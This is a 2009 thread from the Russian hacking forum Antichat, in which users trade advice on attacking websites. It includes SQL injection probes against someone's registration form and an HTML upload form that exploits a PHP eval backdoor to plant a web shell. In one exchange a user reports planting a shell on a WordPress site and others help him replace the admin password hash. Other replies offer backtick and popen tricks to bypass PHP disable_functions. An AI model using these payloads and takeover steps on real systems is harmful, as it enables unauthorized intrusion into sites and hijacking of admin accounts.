HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10461  
Старый 29.11.2009, 01:45
drakstart
Новичок
Регистрация: 28.11.2009
Сообщений: 1
С нами: 8658555

Репутация: 0
По умолчанию

уже писал раз но тема куда-то пропала(
вообщем вопрос

есть сайт где форма регистрации проверяет уникальность имени
так вот такие запросы

?username=vasja' or '1'='1
?username=vasja' or 1=1
?username=vasja' or '1'='1'

приводят к ошыбке 403
если же запрос писать так
?username=vasja' or '1'='2
?username=vasja' or 1=2
?username=vasja' or '1'='2'

то просто выдает сообщение что неверное имя

, я так понимаю єто потенцыальная инекция, только не могу понять почему она проходит и с кавычками и без

Как такое может быть?
 
Ответить с цитированием

  #10462  
Старый 29.11.2009, 02:09
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
 
Ответить с цитированием

  #10463  
Старый 29.11.2009, 10:37
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Nightmarе  
Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
<form action="shell.php?lol=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=./shell.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>
Цитата:
Сообщение от LzD  
[Google Source Code: Поиск багов в исходниках.]
Представлены ссылки для поиска бажного кода.

[1]- GoogleCodeSearch
[2]- GoogleSearch

http://cipher.org.uk/ideas/bugle/

Юзаем , ищем баги, хекоем
В этом проекте и наш ettee участвовал

Последний раз редактировалось Ctacok; 29.11.2009 в 10:39..
 
Ответить с цитированием

  #10464  
Старый 29.11.2009, 21:53
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:

$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.

надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
 
Ответить с цитированием

  #10465  
Старый 29.11.2009, 22:15
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами: 9431076

Репутация: 229
По умолчанию

Цитата:
Сообщение от YuNi|[c  
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:

$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.

надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
 
Ответить с цитированием

  #10466  
Старый 29.11.2009, 22:31
eliteload
Новичок
Регистрация: 22.10.2009
Сообщений: 3
С нами: 8712511

Репутация: 1
Question

disable_functions
Цитата:
rmdir, exec, unlink, shell_exec, escapeshellcmd, system, passthru, pcntl_exec, chmod, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate
возможно ли выполнять системные команды, с такой конфигурацией php.ini? если да, то как?
 
Ответить с цитированием

  #10467  
Старый 29.11.2009, 22:41
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Попробуй
PHP код:
<?=`ls`?>
но не факт, т.к. это аналог shell_exec, вроде...

Последний раз редактировалось mailbrush; 29.11.2009 в 22:45..
 
Ответить с цитированием

  #10468  
Старый 29.11.2009, 22:44
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от mailbrush  
Попробуй
PHP код:
<?=`ls`?>
но не факт, т.к. это аналог shell_exec, вроде
именно.
Поэтому попробуй заюзать popen.
 
Ответить с цитированием

  #10469  
Старый 29.11.2009, 22:44
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от YuNi|[c  
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:

$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.

надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
http://www.insidepro.com/hashes.php?lang=rus --> MD5(Wordpress)
 
Ответить с цитированием

  #10470  
Старый 29.11.2009, 22:49
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от nemaniak  
Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
спс уже нашел вот http://onlinefunctions.net/wordpress-hash-generator.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.